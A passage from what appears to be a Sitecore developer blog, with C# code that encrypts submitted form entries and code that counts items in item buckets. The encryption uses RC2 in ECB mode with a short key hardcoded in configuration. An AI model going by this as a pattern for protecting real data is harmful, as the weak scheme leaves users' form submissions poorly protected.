public class RC2Encryptor : IEncryptor { public string Encrypt(string key, string input) { byte[] inputArray = UTF8Encoding.UTF8.GetBytes(input); RC2CryptoServiceProvider rc2 = new RC2CryptoServiceProvider(); rc2.Key = UTF8Encoding.UTF8.GetBytes(key); rc2.Mode = CipherMode.ECB; rc2.Padding = PaddingMode.PKCS7; ICryptoTransform cTransform = rc2.CreateEncryptor(); byte[] resultArray = cTransform.TransformFinalBlock(inputArray, 0, inputArray.Length); rc2.Clear(); return System.Convert.ToBase64String(resultArray, 0, resultArray.Length); } public string Decrypt(string key, string input) { byte[] inputArray = System.Convert.FromBase64String(input); RC2CryptoServiceProvider rc2 = new RC2CryptoServiceProvider(); rc2.Key = UTF8Encoding.UTF8.GetBytes(key); rc2.Mode = CipherMode.ECB; rc2.Padding = PaddingMode.PKCS7; ICryptoTransform cTransform = rc2.CreateDecryptor(); byte[] resultArray = cTransform.TransformFinalBlock(inputArray, 0, inputArray.Length); rc2.Clear(); return UTF8Encoding.UTF8.GetString(resultArray); } } } Next, I created the following class to store settings I need for encrypting and decrypting data using the RC2 algorithm class above: namespace Sandbox.Foundation.Forms.Models { public class FormEncryptionSettings { public string EncryptionKey { get; set; } } } The encryption key above is needed for the RC2 algorithm to encrypt/decrypt data. I set this key in a config object defined in a Sitecore patch configuration file towards the bottom of this post. I then created an interface for classes that will encrypt/decrypt FormEntry instances (FormEntry objects contain submitted data from form submissions): using Sitecore.ExperienceForms.Data.Entities; namespace Sandbox.Foundation.Forms.Services.Encryption { public interface IFormEntryEncryptor { void EncryptFormEntry(FormEntry entry); void DecryptFormEntry(FormEntry entry); } } The following class implements the interface above: using System.Linq; using Sitecore.ExperienceForms.Data.Entities; using Sandbox.Foundation.Forms.Models; namespace Sandbox.Foundation.Forms.Services.Encryption { public class FormEntryEncryptor : IFormEntryEncryptor { private readonly FormEncryptionSettings _formEncryptionSettings; private readonly IEncryptor _encryptor; public FormEntryEncryptor(FormEncryptionSettings formEncryptionSettings, IEncryptor encryptor) { _formEncryptionSettings = formEncryptionSettings; _encryptor = encryptor; } public void EncryptFormEntry(FormEntry entry) { if (!HasFields(entry)) { return; } foreach (FieldData field in entry.Fields) { EncryptField(field); } } protected virtual void EncryptField(FieldData field) { if(field == null) { return; } field.FieldName = Encrypt(field.FieldName); field.Value = Encrypt(field.Value); field.ValueType = Encrypt(field.ValueType); } protected virtual string Encrypt(string input) { return _encryptor.Encrypt(_formEncryptionSettings.EncryptionKey, input); } public void DecryptFormEntry(FormEntry entry) { if (!HasFields(entry)) { return; } foreach (FieldData field in entry.Fields) { DecryptField(field); } } protected virtual bool HasFields(FormEntry entry) { return entry != null && entry.Fields != null && entry.Fields.Any(); } protected virtual void DecryptField(FieldData field) { if(field == null) { return; } field.FieldName = Decrypt(field.FieldName); field.Value = Decrypt(field.Value); field.ValueType = Decrypt(field.ValueType); } protected virtual string Decrypt(string input) { return _encryptor.Decrypt(_formEncryptionSettings.EncryptionKey, input); } } } The EncryptFormEntry() method above iterates over all FieldData objects contained on the FormEntry instance, and passes them to the EncryptField() mehod which encrypts the FieldName, Value and ValueType properties on them. Likewise, the DecryptFormEntry() method iterates over all FieldData objects contained on the FormEntry instance, and passes them to the DecryptField() mehod which decrypts the same properties mentioned above. I then created an interface for classes that will serve as factories for IFormDataProvider instances: using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public interface IFormDataProviderFactory { IFormDataProvider CreateNewSqlFormDataProvider(ISqlDataApiFactory sqlDataApiFactory); } } The following class implements the interface above: using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.SqlServer; namespace Sandbox.Foundation.Forms.Services.Factories { public class FormDataProviderFactory : IFormDataProviderFactory { public IFormDataProvider CreateNewSqlFormDataProvider(ISqlDataApiFactory sqlDataApiFactory) { return new SqlFormDataProvider(sqlDataApiFactory); } } } The CreateNewSqlFormDataProvider() method above does exactly was the method name says. You’ll see it being used in the following class below. This next class ultimately becomes the new IFormDataProvider instance but decorates the OOTB one which is created from the factory class above: using System; using System.Collections.Generic; using System.Linq; using Sitecore.ExperienceForms.Data; using Sitecore.ExperienceForms.Data.Entities; using Sitecore.ExperienceForms.Data.SqlServer; using Sandbox.Foundation.Forms.Services.Encryption; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms.Services.Data { public class FormEncryptionDataProvider : IFormDataProvider { private readonly IFormDataProvider _innerProvider; private readonly IFormEntryEncryptor _formEntryEncryptor; public FormEncryptionDataProvider(ISqlDataApiFactory sqlDataApiFactory, IFormDataProviderFactory formDataProviderFactory, IFormEntryEncryptor formEntryEncryptor) { _innerProvider = CreateInnerProvider(sqlDataApiFactory, formDataProviderFactory); _formEntryEncryptor = formEntryEncryptor; } protected virtual IFormDataProvider CreateInnerProvider(ISqlDataApiFactory sqlDataApiFactory, IFormDataProviderFactory formDataProviderFactory) { return formDataProviderFactory.CreateNewSqlFormDataProvider(sqlDataApiFactory); } public void CreateEntry(FormEntry entry) { EncryptFormEntryField(entry); _innerProvider.CreateEntry(entry); } protected virtual void EncryptFormEntryField(FormEntry entry) { _formEntryEncryptor.EncryptFormEntry(entry); } public void DeleteEntries(Guid formId) { _innerProvider.DeleteEntries(formId); } public IReadOnlyCollection<FormEntry> GetEntries(Guid formId, DateTime? startDate, DateTime? endDate) { IReadOnlyCollection<FormEntry> entries = _innerProvider.GetEntries(formId, startDate, endDate); if(entries == null || !entries.Any()) { return entries; } foreach(FormEntry entry in entries) { DecryptFormEntryField(entry); } return entries; } protected virtual void DecryptFormEntryField(FormEntry entry) { _formEntryEncryptor.DecryptFormEntry(entry); } } } The class above does delegation to the IFormEntryEncryptor instance to encrypt the FormEntry data and then passes the FormEntry to the inner provider for saving. For decrypting, it retrieves the data from the inner provider, and then decrypts it via the IFormEntryEncryptor instance before returning to the caller. Finally, I created an IServicesConfigurator class to wire everything up into the Sitecore container (I hope you are using Sitecore Dependency Injection capabilities as this comes OOTB — there are no excuses for not using this!!!!!!): using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; using Sitecore.ExperienceForms.Data; using Sandbox.Foundation.Forms.Models; using Sandbox.Foundation.Forms.Services.Encryption; using Sandbox.Foundation.Forms.Services.Data; using Sandbox.Foundation.Forms.Services.Factories; namespace Sandbox.Foundation.Forms { public class FormsServicesConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(provider => GetFormEncryptionSettings(provider)); serviceCollection.AddSingleton<IEncryptor, RC2Encryptor>(); serviceCollection.AddSingleton<IFormEntryEncryptor, FormEntryEncryptor>(); serviceCollection.AddSingleton<IFormDataProviderFactory, FormDataProviderFactory>(); serviceCollection.AddSingleton<IFormDataProvider, FormEncryptionDataProvider>(); } private FormEncryptionSettings GetFormEncryptionSettings(IServiceProvider provider) { return CreateConfigObject<FormEncryptionSettings>(provider, "moduleSettings/foundation/forms/formEncryptionSettings"); } private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class { BaseFactory factory = GetService<BaseFactory>(provider); return factory.CreateObject(path, true) as TConfigObject; } private TService GetService<TService>(IServiceProvider provider) { return provider.GetService<TService>(); } } } Everything above is normal service class registration except for the stuff in the GetFormEncryptionSettings() method. Here, I’m creating an instance of a FormEncryptionSettings class but am instantiating it using the Sitecore Configuration Factory for the configuration object defined in the Sitecore patch configuration file below, and am making that available for being injected into classes that need it (the FormEntryEncryptor above uses it). I then wired everything together using the following Sitecore patch configuration file: <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/"> <sitecore> <services> <configurator type="Sandbox.Foundation.Forms.FormsServicesConfigurator, Sandbox.Foundation.Forms" /> <register serviceType="Sitecore.ExperienceForms.IFormDataProvider, Sitecore.ExperienceForms"> <patch:delete /> </register> </services> <moduleSettings> <foundation> <forms> <formEncryptionSettings type="Sandbox.Foundation.Forms.Models.FormEncryptionSettings, Sandbox.Foundation.Forms" singleInstance="true"> <!-- I stole this from https://sitecorejunkie.com/2013/06/21/encrypt-web-forms-for-marketers-fields-in-sitecore/ --> <EncryptionKey>88bca90e90875a</EncryptionKey> </formEncryptionSettings> </forms> </foundation> </moduleSettings> </sitecore> </configuration> I want to call out that I’m deleting the OOTB IFormDataProvider above using a patch:delete. I’m re-adding it via the IServicesConfigurator above using the decorator class previously shown above. Let’s take this for a spin. I first created a new form (this is under “Forms” on the Sitecore Launchepad ): I then put it on a page with an MVC Layout; published everything; navigated to the test page with the form created above; filled out the form; and then clicked the submit button: Let’s see if the data was encrypted. I opened up SQL Server Management Studio and ran a query on the FormEntry table in my Experience Forms Database: As you can see the data was encrypted. Let’s export the data to make sure it gets decrypted. We can do that by exporting the data as a CSV from Forms in the Sitecore Launchpad: As you can see the data is decrypted in the CSV: I do want to mention that Sitecore MVP João Neto had provided two other methods for encrypting data in Experience Forms in a post he wrote last January. I recommend having a read of that. Until next time, see you on the Sitecore Slack 😉 Display How Many Bucketed Items Live Within a Sitecore Item Bucket Using a Custom DataView Over the past few weeks — if you haven’t noticed — I’ve been having a blast experimenting with Sitecore Item Buckets. It seems new ideas on what to build for it keep flooding my thoughts everyday. 😀 However, the other day an old idea that I wanted to solve a while back bubbled its way up into the forefront of my consciousness: displaying the count of Bucketed Items which live within each Item Bucket in the Content Tree. I’m sure someone has built something to do this before though I didn’t really do any research on it as I was up for the challenge. darth-vader-didnt-read In all honesty, I enjoy spending my nights after work and on weekends building things in Sitecore — even if someone has built something like it before — as it’s a great way to not only discover new treasures hidden within the Sitecore assemblies, but also improve my programming skills — the saying “you lose it if you don’t use it” applies here. nerds You might be asking “Mike, we don’t store that many Sitecore Items in our Item Buckets; I can just go count them all by hand”. Well, if that’s the case for you then you might want to reconsider why you are using the Item Buckets feature. However, in theory, thousands if not millions of Items can live within an Item Bucket in Sitecore. If counting by hand is your thing — or even writing some sort of “script” (I’m not referring to PowerShell scripts that you would write using Sitecore PowerShell Extensions (SPE) — I definitely recommend harnessing all of the power this module has to offer — but instead to standalone ASP.NET Web Forms which some people erroneously call “scripts”) to generate some kind of report, then by all means go for it. counting That’s just not how I roll. aint-no-time-for-that So how are we going to display these counts to the user? We are ultimately going to create a custom Sitecore DataView. If you aren’t familiar with DataViews in Sitecore, they basically allow you to change how Items are displayed in the Sitecore Content Tree. I’m not going to go too much into details of how these work. I recommend having a read of the following posts by two fellow Sitecore MVPs for more information and to see other examples: I do want to warn you: there is a lot of code in this post. arghhhhh You might want to go get a snack for this as it might take a while to get through all the code that I am showing here. Don’t worry, I’ll wait for you to get back. eat-popcorn Anyways, let’s jump right into it. partay-meow For this feature, I want to add a checkbox toggle in the Sitecore Ribbon to give users the ability turn this feature on and off. bucketed-items-count-view-ribbon In order to save the state of this checkbox, I defined the following interface: namespace Sitecore.Sandbox.Web.UI.HtmlControls.Registries { public interface IRegistry { bool GetBool(string key); bool GetBool(string key, bool defaultvalue); int GetInt(string key); int GetInt(string key, int defaultvalue); string GetString(string key); string GetString(string key, string defaultvalue); string GetValue(string key); void SetBool(string key, bool val); void SetInt(string key, int val); void SetString(string key, string value); void SetValue(string key, string value); } } Classes of the above interface will keep track of settings which need to be stored somewhere. The following class implements the interface above: namespace Sitecore.Sandbox.Web.UI.HtmlControls.Registries { public class Registry : IRegistry { public virtual bool GetBool(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetBool(key); } public virtual bool GetBool(string key, bool defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetBool(key, defaultvalue); } public virtual int GetInt(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetInt(key); } public virtual int GetInt(string key, int defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetInt(key, defaultvalue); } public virtual string GetString(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetString(key); } public virtual string GetString(string key, string defaultvalue) { return Sitecore.Web.UI.HtmlControls.Registry.GetString(key, defaultvalue); } public virtual string GetValue(string key) { return Sitecore.Web.UI.HtmlControls.Registry.GetValue(key); } public virtual void SetBool(string key, bool val) { Sitecore.Web.UI.HtmlControls.Registry.SetBool(key, val); } public virtual void SetInt(string key, int val) { Sitecore.Web.UI.HtmlControls.Registry.SetInt(key, val); } public virtual void SetString(string key, string value) { Sitecore.Web.UI.HtmlControls.Registry.SetString(key, value); } public virtual void SetValue(string key, string value) { Sitecore.Web.UI.HtmlControls.Registry.SetValue(key, value); } } } I’m basically wrapping calls to methods on the static Sitecore.Web.UI.HtmlControls.Registry class which is used for saving state on the checkboxes in the Sitecore ribbon — it might be used for keeping track of other things in the Sitecore Content Editor though that is beyond the scope of this post. Nothing magical going on here. I then defined the following interface for keeping track of Content Editor settings for things related to Item Buckets: namespace Sitecore.Sandbox.Buckets.Settings { public interface IBucketsContentEditorSettings { bool ShowBucketedItemsCount { get; set; } bool AreItemBucketsEnabled { get; } } } The ShowBucketedItemsCount boolean property lets the caller know if we are to show the Bucketed Items count, and the AreItemBucketsEnabled boolean property lets the caller know if the Item Buckets feature is enabled in Sitecore. The following class implements the interface above: using Sitecore.Diagnostics; using Sitecore.Sandbox.Determiners.Features; using Sitecore.Sandbox.Web.UI.HtmlControls.Registries; namespace Sitecore.Sandbox.Buckets.Settings { public class BucketsContentEditorSettings : IBucketsContentEditorSettings { protected IFeatureDeterminer ItemBucketsFeatureDeterminer { get; set; } protected IRegistry Registry { get; set; } protected string ShowBucketedItemsCountRegistryKey { get; set; } public bool ShowBucketedItemsCount { get { return ShouldShowBucketedItemsCount(); } set { ToggleShowBucketedItemsCount(value); } } public bool AreItemBucketsEnabled { get { return GetAreItemBucketsEnabled(); } } protected virtual bool ShouldShowBucketedItemsCount() { if (!AreItemBucketsEnabled) { return false; } EnsureRegistryDependencies(); return Registry.GetBool(ShowBucketedItemsCountRegistryKey, false); } protected virtual void ToggleShowBucketedItemsCount(bool turnOn) { if (!AreItemBucketsEnabled) { return; } EnsureRegistryDependencies(); Registry.SetBool(ShowBucketedItemsCountRegistryKey, turnOn); } protected virtual void EnsureRegistryDependencies() { Assert.IsNotNull(Registry, "Registry must be defined in configuration!"); Assert.IsNotNullOrEmpty(ShowBucketedItemsCountRegistryKey, "ShowBucketedItemsCountRegistryKey must be defined in configuration!"); } protected virtual bool GetAreItemBucketsEnabled() { Assert.IsNotNull(ItemBucketsFeatureDeterminer, "ItemBucketsFeatureDeterminer must be defined in configuration!"); return ItemBucketsFeatureDeterminer.IsEnabled(); } } } I’m injecting an IFeatureDeterminer instance into the instance of the class above via the Sitecore Configuration Factory — have a look at the patch configuration file further down in this post — specifically the ItemBucketsFeatureDeterminer which is defined in a previous blog post. The IFeatureDeterminer instance determines whether the Item Buckets feature is turned on/off (I’m not going to repost that code here so if you haven’t seen this code, please go have a look now so you have an understanding of what it’s doing). Its instance is used in the GetAreItemBucketsEnabled() method which just delegates to its IsEnabled() method and returns the value from that call. The GetAreItemBucketsEnabled() method is used in the get accessor of the AreItemBucketsEnabled property. I’m also injecting an IRegistry instance into the instance of the class above — this is also defined in the patch configuration file further down — which is used for storing/retrieving the value of the ShowBucketedItemsCount property. It is leveraged in the ShouldShowBucketedItemsCount() and ToggleShowBucketedItemsCount() methods where a boolean value is saved or retrieved, respectively, in the Sitecore Registry under a certain key — this key is also injected into the ShowBucketedItemsCountRegistryKey property via the Sitecore Configuration Factory. So, we now have a way to keep track of whether we should display the Bucketed Items count. We just need a way to let the user turn this on/off. To do that, I need to create a custom Sitecore.Shell.Framework.Commands.Command. Since Sitecore Commands are instantiated by the CreateObject() method on the MainUtil class (this lives in the Sitecore namespace in Sitecore.Kernel.dll and isn’t as advanced as the Sitecore.Configuration.Factory class as it won’t instantiate nested objects defined in configuration as does the Sitecore Configuration Factory), I built the following Command which will decorate Commands defined in Sitecore configuration: using System.Xml; using Sitecore.Configuration; using Sitecore.Diagnostics; using Sitecore.Shell.Framework.Commands; using Sitecore.Web.UI.HtmlControls; using Sitecore.Xml; namespace Sitecore.Sandbox.Shell.Framework.Commands { public class ExtendedConfigCommand : Command { private Command command; protected Command Command { get { if(command == null) { command = GetCommand(); EnsureCommand(); } return command; } } protected virtual Command GetCommand() { XmlNode currentCommandNode = Factory.GetConfigNode(string.Format("commands/command[@name='{0}']", Name)); string configPath = XmlUtil.GetAttribute("extendedCommandPath", currentCommandNode); Assert.IsNotNullOrEmpty(configPath, string.Format("The extendedCommandPath attribute must be set {0}!", currentCommandNode)); Command command = Factory.CreateObject(configPath, false) as Command; Assert.IsNotNull(command, string.Format("The command defined at '{0}' was either not properly set or is not an instance of Sitecore.Shell.Framework.Commands.Command. Double-check it!", configPath)); return command; } protected virtual void EnsureCommand() { Assert.IsNotNull(Command, "GetCommand() cannot return a null Sitecore.Shell.Framework.Commands.Command instance!"); } public override void Execute(CommandContext context) { Command.Execute(context); } public override string GetClick(CommandContext context, string click) { return Command.GetClick(context, click); } public override string GetHeader(CommandContext context, string header) { return Command.GetHeader(context, header); } public override string GetIcon(CommandContext context, string icon) { return Command.GetIcon(context, icon); } public override Control[] GetSubmenuItems(CommandContext context) { return Command.GetSubmenuItems(context); } public override string GetToolTip(CommandContext context, string tooltip) { return Command.GetToolTip(context, tooltip); } public override string GetValue(CommandContext context, string value) { return Command.GetValue(context, value); } public override CommandState QueryState(CommandContext context) { return Command.QueryState(context); } } } The GetCommand() method reads the XmlNode for the current command, and gets the value set on its extendedCommandPath attribute. This value must to be a config path defined under the <sitecore> element in Sitecore configuration. If the attribute doesn’t exist or is empty, or a Command instance isn’t properly created, an exception is thrown. Otherwise, it is set on the Command property on the class. All methods here delegate to the same methods on the Command stored in the Command property. I then defined the following Command which will be used by the checkbox we are adding to the Sitecore Ribbon: using Sitecore.Diagnostics; using Sitecore.Shell.Framework.Commands; using Sitecore.Web.UI.Sheer; using Sitecore.Sandbox.Buckets.Settings; namespace Sitecore.Sandbox.Buckets.Shell.Framework.Commands { public class ToggleBucketedItemsCountCommand : Command { protected IBucketsContentEditorSettings BucketsContentEditorSettings { get; set; } public override void Execute(CommandContext context) { if (!AreItemBucketsEnabled()) { return; } ToggleShowBucketedItemsCount(); Reload(); } protected virtual void ToggleShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); BucketsContentEditorSettings.ShowBucketedItemsCount = !BucketsContentEditorSettings.ShowBucketedItemsCount; } protected virtual void Reload() { SheerResponse.SetLocation(string.Empty); } public override CommandState QueryState(CommandContext context) { if(!AreItemBucketsEnabled()) { return CommandState.Hidden; } if(!ShouldShowBucketedItemsCount()) { return CommandState.Enabled; } return CommandState.Down; } protected virtual bool AreItemBucketsEnabled() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.AreItemBucketsEnabled; } protected virtual bool ShouldShowBucketedItemsCount() { Assert.IsNotNull(BucketsContentEditorSettings, "BucketsContentEditorSettings must be defined in configuration!"); return BucketsContentEditorSettings.ShowBucketedItemsCount; } } } The QueryState() method determines whether we should display the checkbox — it will only be displayed if the Item Buckets feature is on — and what the state of the checkbox should be — if we are currently showing Bucketed Items count, the checkbox will be checked (this is represented by CommandState.Down). Otherwise, it will be unchecked (this is represented by CommandState.Enabled). The Execute() method encapsulates the logic of what we are to do when the user checks/unchecks the checkbox. It’s basically delegating to the ToggleShowBucketedItemsCount() method to toggle the value of whether we are to display the Bucketed Items count, and then reloads the Content Editor to refresh the display in the Content Tree. I then had to define this checkbox in the Core database: bucketed-items-count-checkbox-core I’m not going to go into details of how the above works as I’ve written over a gazillion posts on the subject. I recommend having a read of one of these older posts. After going back to my Master database, I saw the new checkbox in the Sitecore Ribbon: buckted-items-count-new-checkbox Since we could be dealing with thousands — if not millions — of Bucketed Items for each Item Bucket, we need a performant way to grab the count of these Items. In this solution, I am leveraging the Sitecore.ContentSearch API to get these counts though needed to add some custom Computed Index Field classes: using Sitecore.Buckets.Managers; using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.ComputedFields; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; namespace Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields { public class IsBucketed : AbstractComputedIndexField { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; private set; } public IsBucketed() { ItemBucketsFeatureMethods = GetItemBucketsFeatureMethods(); Assert.IsNotNull(ItemBucketsFeatureMethods, "GetItemBucketsFeatureMethods() cannot return null!"); } protected virtual IItemBucketsFeatureMethods GetItemBucketsFeatureMethods() { IItemBucketsFeatureMethods methods = Factory.CreateObject("buckets/methods/itemBucketsFeatureMethods", false) as IItemBucketsFeatureMethods; Assert.IsNotNull(methods, "the IItemBucketsFeatureMethods instance was not defined properly in /sitecore/buckets/methods/itemBucketsFeatureMethods!"); return methods; } public override object ComputeFieldValue(IIndexable indexable) { Item item = indexable as SitecoreIndexableItem; if (item == null) { return null; } return IsBucketable(item) && IsItemContainedWithinBucket(item); } protected virtual bool IsBucketable(Item item) { Assert.ArgumentNotNull(item, "item"); return BucketManager.IsBucketable(item); } protected virtual bool IsItemContainedWithinBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if(IsItemBucket(item)) { return false; } return ItemBucketsFeatureMethods.IsItemContainedWithinBucket(item); } protected virtual bool IsItemBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if (!ItemBucketsFeatureMethods.IsItemBucket(item)) { return false; } return true; } } } An instance of the class above ultimately determines if an Item is bucketed within an Item Bucket, and passes a boolean value to its caller denoting this via its ComputeFieldValue() method. What determines whether an Item is bucketed? The code above says it’s bucketed only when the Item is bucketable and is contained within an Item Bucket. The IsBucketable() method above ascertains whether the Item is bucketable by delegating to the IsBucketable() method on the BucketManager class in Sitecore.Buckets.dll. The IsItemContainedWithinBucket() method determines if the Item is contained within an Item Bucket — you might be laughing as the name on the method is self-documenting — by delegating to the IsItemContainedWithinBucket() method on the IItemBucketsFeatureMethods instance — I’ve defined the code for this in this post so go have a look. Moreover, the code does not consider Item Buckets to be Bucketed as that just doesn’t make much sense. 😉 This would also give us an inaccurate count. The following Computed Index Field’s ComputeFieldValue() method returns the string representation of the ancestor Item Bucket’s Sitecore.Data.ID for the Item — if it is contained within an Item Bucket: using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.ComputedFields; using Sitecore.ContentSearch.Utilities; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Sandbox.Buckets.Util.Methods; namespace Sitecore.Sandbox.Buckets.ContentSearch.ComputedFields { public class ItemBucketAncestorId : AbstractComputedIndexField { protected IItemBucketsFeatureMethods ItemBucketsFeatureMethods { get; private set; } public ItemBucketAncestorId() { ItemBucketsFeatureMethods = GetItemBucketsFeatureMethods(); Assert.IsNotNull(ItemBucketsFeatureMethods, "GetItemBucketsFeatureMethods() cannot return null!"); } protected virtual IItemBucketsFeatureMethods GetItemBucketsFeatureMethods() { IItemBucketsFeatureMethods methods = Factory.CreateObject("buckets/methods/itemBucketsFeatureMethods", false) as IItemBucketsFeatureMethods; Assert.IsNotNull(methods, "the IItemBucketsFeatureMethods instance was not defined properly in /sitecore/buckets/methods/itemBucketsFeatureMethods!"); return methods; } public override object ComputeFieldValue(IIndexable indexable) { Item item = indexable as SitecoreIndexableItem; if (item == null) { return null; } Item itemBucketAncestor = GetItemBucketAncestor(item); if(itemBucketAncestor == null) { return null; } return NormalizeGuid(itemBucketAncestor.ID); } protected virtual Item GetItemBucketAncestor(Item item) { Assert.ArgumentNotNull(item, "item"); if(IsItemBucket(item)) { return null; } Item itemBucket = ItemBucketsFeatureMethods.GetItemBucket(item); if(!IsItemBucket(itemBucket)) { return null; } return itemBucket; } protected virtual bool IsItemBucket(Item item) { Assert.ArgumentNotNull(item, "item"); if (!ItemBucketsFeatureMethods.IsItemBucket(item)) { return false; } return true; } protected virtual string NormalizeGuid(ID id) { return IdHelper.NormalizeGuid(id); } } } Not to go too much into details of the class above, it will only return an Item Bucket’s Sitecore.Data.ID as a string if the Item lives within an Item Bucket and is not itself an Item Bucket. If the Item is not within an Item Bucket or is an Item Bucket, null is returned to the caller via the ComputeFieldValue() method. I then created the following subclass of Sitecore.ContentSearch.SearchTypes.SearchResultItem — this lives in Sitecore.ContentSearch.dll — in order to use the values in the index that the previous Computed Field Index classes returned for their storage in the search index: using System.ComponentModel; using Sitecore.ContentSearch; using Sitecore.ContentSearch.Converters; using Sitecore.ContentSearch.SearchTypes; using Sitecore.Data; namespace Sitecore.Sandbox.Buckets.ContentSearch.SearchTypes { public class BucketedSearchResultItem : SearchResultItem { [IndexField("item_bucket_ancestor_id")] [TypeConverter(typeof(IndexFieldIDValueConverter))] public ID ItemBucketAncestorId { get; set; } [IndexField("is_bucketed")] public bool IsBucketed { get; set; } } } Now, we need a class to get the Bucketed Item count for an Item Bucket. I defined the following interface for class implementations that do just that: using Sitecore.Data.Items; namespace Sitecore.Sandbox.Buckets.Providers.Items { public interface IBucketedItemsCountProvider { int GetBucketedItemsCount(Item itemBucket); } } I then created the following class that implements the interface above: using System; using System.Collections.Generic; using System.Linq; using System.Linq.Expressions; using System.Xml; using Sitecore.Configuration; using Sitecore.ContentSearch; using Sitecore.ContentSearch.Linq; using Sitecore.ContentSearch.Linq.Utilities; using Sitecore.ContentSearch.SearchTypes; using Sitecore.ContentSearch.Utilities; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Diagnostics; using Sitecore.Xml; using Sitecore.Sandbox.Buckets.ContentSearch.SearchTypes; namespace Sitecore.Sandbox.Buckets.Providers.Items { public class BucketedItemsCountProvider : IBucketedItemsCountProvider { protected IDictionary<string, ISearchIndex> SearchIndexMap { get; private set; } public BucketedItemsCountProvider() { SearchIndexMap = CreateNewSearchIndexMap(); } protected virtual IDictionary<string, ISearchIndex> CreateNewSearchIndexMap() { return new Dictionary<string, ISearchIndex>(); } protected virtual void AddSearchIndexMap(XmlNode configNode) { if(configNode == null) { return; } string databaseName = XmlUtil.GetAttribute("database", configNode, null); Assert.IsNotNullOrEmpty(databaseName, "The database attribute on the searchIndexMap configuration element cannot be null or the empty string!"); Assert.ArgumentCondition(!SearchIndexMap.ContainsKey(databaseName), "database", "The searchIndexMap configuration element's database attribute values must be unique!"); Database database = Factory.GetDatabase(databaseName); Assert.IsNotNull(database, string.Format("No database exists with the name of '{0}'! Make sure the database attribute on your searchIndexMap configuration element is set correctly!", databaseName)); string searchIndexName = XmlUtil.GetAttribute("searchIndex", configNode, null); Assert.IsNotNullOrEmpty(searchIndexName, "The searchIndex attribute on the searchIndexMap configuration element cannot be null or the empty string!"); ISearchIndex searchIndex = GetSearchIndex(searchIndexName); Assert.IsNotNull(searchIndex, string.Format("No search index exists with the name of '{0}'! Make sure the searchIndex attribute on your searchIndexMap configuration element is set correctly", searchIndexName)); SearchIndexMap.Add(databaseName, searchIndex); } public virtual int GetBucketedItemsCount(Item bucketItem) { Assert.ArgumentNotNull(bucketItem, "bucketItem"); ISearchIndex searchIndex = GetSearchIndex(); using (IProviderSearchContext searchContext = searchIndex.CreateSearchContext()) { var predicate = GetSearchPredicate<BucketedSearchResultItem>(bucketItem.ID); IQueryable<SearchResultItem> query = searchContext.GetQueryable<BucketedSearchResultItem>().Filter(predicate); SearchResults<SearchResultItem> results = query.GetResults(); return results.Count(); } } protected virtual ISearchIndex GetSearchIndex() { string databaseName = GetContentDatabaseName(); Assert.IsNotNullOrEmpty(databaseName, "The GetContentDatabaseName() method cannot return null or the empty string!"); Assert.ArgumentCondition(SearchIndexMap.ContainsKey(databaseName), "databaseName", string.Format("There is no ISearchIndex instance mapped to the database: '{0}'!", databaseName)); return SearchIndexMap[databaseName]; } protected virtual string GetContentDatabaseName() { Database database = Context.ContentDatabase ?? Context.Database; Assert.IsNotNull(database, "Argggggh! There's no content database! Houston, we have a problem!"); return database.Name; } protected virtual ISearchIndex GetSearchIndex(string searchIndexName) { Assert.ArgumentNotNullOrEmpty(searchIndexName, "searchIndexName"); return ContentSearchManager.GetIndex(searchIndexName); } protected virtual Expression<Func<TSearchResultItem, bool>> GetSearchPredicate<TSearchResultItem>(ID itemBucketId) where TSearchResultItem : BucketedSearchResultItem { Assert.ArgumentCondition(!ID.IsNullOrEmpty(itemBucketId), "itemBucketId", "itemBucketId cannot be null or empty!"); var predicate = PredicateBuilder.True<TSearchResultItem>(); predicate = predicate.And(item => item.ItemBucketAncestorId == itemBucketId); predicate = predicate.And(item => item.IsBucketed); return predicate; } } } Ok, so what’s going on in the class above? The AddSearchIndexMap() method is called by the Sitecore Configuration Factory to add database-to-search-index mappings — have a look at the patch configuration file further below. The code is looking up the appropriate search index for the content/context database. The GetBucketedItemsCount() method gets the “predicate” from the GetSearchPredicate() method which basically says “Hey, I want an Item that has an ancestor Item Bucket Sitecore.Data.ID which is the same as the Sitecore.Data.ID passed to the method, and also this Item should be bucketed”. The GetBucketedItemsCount() method then employs the Sitecore.ContentSearch API to get the result-set of the Items for the query, and returns the count of those Items. Just as Commands, DataViews in Sitecore are instantiated by the CreateObject() method on MainUtil. I want to utilize the Sitecore Configuration Factory instead so that my nested configuration elements are instantiated and injected into my custom DataView. I built the following interface to make that possible: using System.Collections; using Sitecore.Collections; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sitecore.Sandbox.Web.UI.HtmlControls.DataViews { public interface IDataViewBaseExtender { void FilterItems(ref ArrayList children, string filter); void GetChildItems(ItemCollection items, Item item); Database GetDatabase(); Item GetItemFromID(string id, Language language, Version version); Item GetParentItem(Item item); bool HasChildren(Item item, string filter); void Initialize(string parameters); 